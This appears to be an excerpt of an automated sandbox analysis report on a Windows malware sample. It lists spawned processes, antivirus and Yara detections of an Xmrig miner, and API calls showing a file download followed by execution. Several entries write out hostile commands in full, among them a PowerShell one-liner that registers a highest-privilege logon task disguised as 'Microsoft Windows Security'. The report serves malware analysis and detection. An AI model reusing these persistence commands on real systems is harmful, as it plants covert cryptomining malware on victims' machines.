                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                            • Detection: 75%, ReversingLabs
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                            Start time:01:26:49
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                                                                                                                                            Imagebase:0x7ff64c210000
                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                            Start time:01:26:49
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                            Start time:01:26:49
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                                                                                                                                            Imagebase:0x7ff64c210000
                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                            Start time:01:26:49
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                            Start time:01:26:49
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                                                                                                                                            Imagebase:0x7ff7d36b0000
                                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                            Start time:01:26:49
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                                                                                                                                            Imagebase:0x7ff6ac2c0000
                                                                                                                                                                                            File size:235'008 bytes
                                                                                                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                            Start time:01:26:57
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\2314627202.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\2314627202.exe
                                                                                                                                                                                            Imagebase:0x870000
                                                                                                                                                                                            File size:15'872 bytes
                                                                                                                                                                                            MD5 hash:0C37EE292FEC32DBA0420E6C94224E28
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                            • Detection: 58%, ReversingLabs
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                            Start time:01:27:06
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1091722296.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\1091722296.exe
                                                                                                                                                                                            Imagebase:0x600000
                                                                                                                                                                                            File size:10'240 bytes
                                                                                                                                                                                            MD5 hash:96509AB828867D81C1693B614B22F41D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                            • Detection: 76%, ReversingLabs
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                            Start time:01:27:12
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1239611256.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\1239611256.exe
                                                                                                                                                                                            Imagebase:0x7ff6904f0000
                                                                                                                                                                                            File size:5'827'584 bytes
                                                                                                                                                                                            MD5 hash:13B26B2C7048A92D6A843C1302618FAD
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                            • Detection: 76%, ReversingLabs
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                            Start time:01:27:14
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\146916724.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\146916724.exe
                                                                                                                                                                                            Imagebase:0xc90000
                                                                                                                                                                                            File size:13'312 bytes
                                                                                                                                                                                            MD5 hash:5A0D146F7A911E98DA8CC3C6DE8ACABF
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 55%, ReversingLabs
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                            Start time:01:27:17
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                            Imagebase:0x7ff6e3d50000
                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                            Start time:01:27:17
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                            Start time:01:27:27
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe"
                                                                                                                                                                                            Imagebase:0x7ff7ad1b0000
                                                                                                                                                                                            File size:5'827'584 bytes
                                                                                                                                                                                            MD5 hash:13B26B2C7048A92D6A843C1302618FAD
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000022.00000002.3142710101.00007FF7AD1CB000.00000004.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000022.00000002.3142710101.00007FF7AD1CB000.00000004.00000001.01000000.00000010.sdmp, Author: unknown
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                            • Detection: 76%, ReversingLabs
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                            Start time:01:27:32
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                            Imagebase:0x7ff6e3d50000
                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                            Start time:01:27:32
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                            Start time:01:27:45
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                            Start time:01:27:45
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                            Imagebase:0x7ff6e3d50000
                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                            Start time:01:27:45
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:40
                                                                                                                                                                                            Start time:01:27:46
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\System32\dwm.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\System32\dwm.exe
                                                                                                                                                                                            Imagebase:0x7ff68eb30000
                                                                                                                                                                                            File size:94'720 bytes
                                                                                                                                                                                            MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000028.00000002.3515022371.000002640F711000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            Target ID:43
                                                                                                                                                                                            Start time:01:28:07
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe"
                                                                                                                                                                                            Imagebase:0x7ff7ad1b0000
                                                                                                                                                                                            File size:5'827'584 bytes
                                                                                                                                                                                            MD5 hash:13B26B2C7048A92D6A843C1302618FAD
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            Target ID:44
                                                                                                                                                                                            Start time:01:28:13
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                            Imagebase:0x7ff6e3d50000
                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            Target ID:45
                                                                                                                                                                                            Start time:01:28:13
                                                                                                                                                                                            Start date:26/10/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            Reset < >

                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                              Execution Coverage:45.9%
                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                              Signature Coverage:45.3%
                                                                                                                                                                                              Total number of Nodes:95
                                                                                                                                                                                              Total number of Limit Nodes:3
                                                                                                                                                                                              execution_graph 301 141cd5 _except_handler4_common 302 141875 303 141890 302->303 304 141889 _exit 302->304 305 141899 _cexit 303->305 306 14189f __onexit 303->306 304->303 305->306 314 1418c6 315 1418d4 __set_app_type _encode_pointer __p__fmode __p__commode 314->315 317 141973 _pre_c_init __RTC_Initialize 315->317 318 141981 __setusermatherr 317->318 319 14198d 317->319 318->319 324 141cfa _controlfp_s 319->324 322 1419a4 323 14199b _configthreadlocale 323->322 325 141d16 _invoke_watson 324->325 326 141992 324->326 325->326 326->322 326->323 246 1416e7 264 141c7c 246->264 248 1416f3 GetStartupInfoA 249 141721 248->249 250 141733 249->250 251 14173a Sleep 249->251 252 141753 _amsg_exit 250->252 253 14175d 250->253 251->249 254 141786 252->254 253->254 255 141766 _initterm_e 253->255 257 141795 _initterm 254->257 258 1417b0 __IsNonwritableInCurrentImage 254->258 255->254 256 141781 __onexit 255->256 257->258 259 14184b _ismbblead 258->259 260 141890 258->260 263 141835 exit 258->263 265 1410b0 Sleep 258->265 259->258 260->256 261 141899 _cexit 260->261 261->256 263->258 264->248 266 1410e5 DeleteFileW CopyFileW FindWindowA 265->266 267 141107 MoveFileW 266->267 268 141113 266->268 267->268 268->266 269 14111a 268->269 270 141332 LoadLibraryA 269->270 271 14134c 270->271 272 14167b 270->272 273 141356 LoadLibraryA 271->273 272->258 273->272 274 14136a 273->274 275 141377 LoadLibraryA 274->275 275->272 276 141389 275->276 277 141396 LoadLibraryA 276->277 277->272 278 1413a8 277->278 279 1413b2 GetProcAddress 278->279 279->272 280 1413c9 279->280 281 1413d6 GetProcAddress 280->281 281->272 282 1413e7 281->282 283 1413f4 GetProcAddress 282->283 283->272 284 14140b 283->284 285 141418 GetProcAddress 284->285 285->272 286 14142d GetTickCount srand 285->286 287 141443 286->287 288 141457 mbstowcs 287->288 289 141487 288->289 289->289 290 1414a7 mbstowcs wsprintfW PathFileExistsW 289->290 291 141659 FreeLibrary FreeLibrary FreeLibrary FreeLibrary 290->291 292 1414f7 290->292 291->272 292->292 293 141517 mbstowcs 292->293 294 141547 293->294 294->294 295 141567 mbstowcs rand wsprintfW 294->295 296 1415c0 295->296 297 1415d7 mbstowcs 296->297 298 1415fa 297->298 299 14160b mbstowcs URLDownloadToFileW 298->299 299->291 300 141640 ShellExecuteW 299->300 300->291 327 1419a7 330 141d28 327->330 329 1419ac 329->329 331 141d4d 330->331 332 141d5a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 330->332 331->332 333 141d51 331->333 332->333 333->329 307 1419b1 308 1419ed 307->308 310 1419c3 307->310 309 1419e8 ?terminate@ 309->308 310->308 310->309 334 1416a1 339 141aad 334->339 337 1416e6 338 1416de _amsg_exit 338->337 342 141a08 339->342 341 1416a6 __getmainargs 341->337 341->338 349 141c7c 342->349 344 141a14 _decode_pointer 345 141a37 7 API calls 344->345 346 141a2b _onexit 344->346 350 141aa4 _unlock 345->350 347 141a9b __onexit 346->347 347->341 349->344 350->347 351 141861 _XcptFilter 311 141df8 IsDebuggerPresent _crt_debugger_hook SetUnhandledExceptionFilter UnhandledExceptionFilter 312 141ee2 _crt_debugger_hook 311->312 313 141eea GetCurrentProcess TerminateProcess 311->313 312->313

                                                                                                                                                                                              Callgraph

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • Sleep.KERNELBASE(00000BB8), ref: 001410BF
                                                                                                                                                                                              • DeleteFileW.KERNELBASE(52739528375892398529738), ref: 001410EA
                                                                                                                                                                                              • CopyFileW.KERNELBASE(252739579837979d79d797d87,23579327592387592739737875,00000000), ref: 001410F8
                                                                                                                                                                                              • FindWindowA.USER32(WinDefucker,00000000), ref: 00141101
                                                                                                                                                                                              • MoveFileW.KERNEL32(fuyuyuyuyuyu,7d77w7d7), ref: 00141111
                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(00000000), ref: 0014133C
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000), ref: 0014135A
                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(00000000), ref: 0014137B
                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(00000000), ref: 0014139A
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 001413BD
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 001413DB
                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 001413FD
                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00141421
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0014142D
                                                                                                                                                                                              • srand.MSVCR90 ref: 00141434
                                                                                                                                                                                              • mbstowcs.MSVCR90 ref: 00141468
                                                                                                                                                                                              • mbstowcs.MSVCR90 ref: 001414B8
                                                                                                                                                                                              • wsprintfW.USER32 ref: 001414E0
                                                                                                                                                                                              • PathFileExistsW.KERNELBASE(?), ref: 001414ED
                                                                                                                                                                                              • mbstowcs.MSVCR90 ref: 00141528
                                                                                                                                                                                              • mbstowcs.MSVCR90 ref: 00141578
                                                                                                                                                                                              • rand.MSVCR90 ref: 00141588
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2346757377.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2346712739.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2346774324.0000000000142000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2346797647.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_140000_Us051y7j25.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressFileLibraryLoadProcmbstowcs$CopyCountDeleteExistsFindMovePathSleepTickWindowrandsrandwsprintf
                                                                                                                                                                                              • String ID: %s\%d%s$%s\%s$23579327592387592739737875$252739579837979d79d797d87$52739528375892398529738$7d77w7d7$WinDefucker$fuyuyuyuyuyu
                                                                                                                                                                                              • API String ID: 3775488452-3202816608
                                                                                                                                                                                              • Opcode ID: 54bc85e6efe7445f0499edc3831fa31da06e252734bbbd1ee02c2a1fb67bb5a4
                                                                                                                                                                                              • Instruction ID: ce6e7a46923c035b3d9ded67383e259c6167cb65bfea35eca88147b0902414fb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 54bc85e6efe7445f0499edc3831fa31da06e252734bbbd1ee02c2a1fb67bb5a4
                                                                                                                                                                                              • Instruction Fuzzy Hash: EBF151B95083419BC324DF64D840EAB77E9AFD9344F44891DF58983271EBB4D5C4CBA2

                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                              Execution Coverage:0.9%
                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                              Signature Coverage:17.6%
                                                                                                                                                                                              Total number of Nodes:1491
                                                                                                                                                                                              Total number of Limit Nodes:8
